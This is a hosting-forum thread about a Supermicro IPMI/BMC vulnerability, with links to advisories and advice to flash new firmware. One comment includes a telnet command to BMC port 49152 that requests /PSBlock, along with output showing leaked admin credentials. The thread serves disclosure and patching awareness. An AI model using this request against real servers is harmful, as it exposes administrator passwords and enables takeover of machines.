New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
New vulnerability - Supermicro IPMI / BMC
ndelaespada
Member, Host Rep
in General
Is your IMPI still accessible from anywhere?
https://isc.sans.edu/diary/New+Supermicro+IPMIBMC+Vulnerability/18285
Comments
Wow, that's sad! Now I know why security by obscurity is bad
Damn. Immediately made me think about the automated firewall Incero put in place a while back. Time for them to sit back and smile. Shameless plug on the company my best friend works for.
latest fw closes that hole and encrypts passwords.
This vuln has been around for 1+ year, Zeekill used to "demonstrate" (sigh) at on my dev servers (although with consent)
ouch! still tons of servers wide open out there :S
https://isc.sans.edu/diary/New+Supermicro+IPMIBMC+Vulnerability/18285
http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
Basicly:
People who have a supermicro machine with the Nuvoton WPCM450 controller chip, their IPMI is vulnerable, others aren't. If you do, flash new firmware, if that's not possible/not working, try this instead:
Yeahh:
telnet 192.168.178.63 49152 Trying 192.168.178.63... Connected to 192.168.178.63. Escape character is '^]'. GET /PSBlock ?/} adminADMINADMINTT????%??"?o???DDD@ ?Connection closed by foreign host.
It took until you saw this to know that?
""Sounds like fun" ((c) James T. Kirk).
It turns out most such a silly vulnerabilities are in the wild for quite a time.
Its just an expression, mate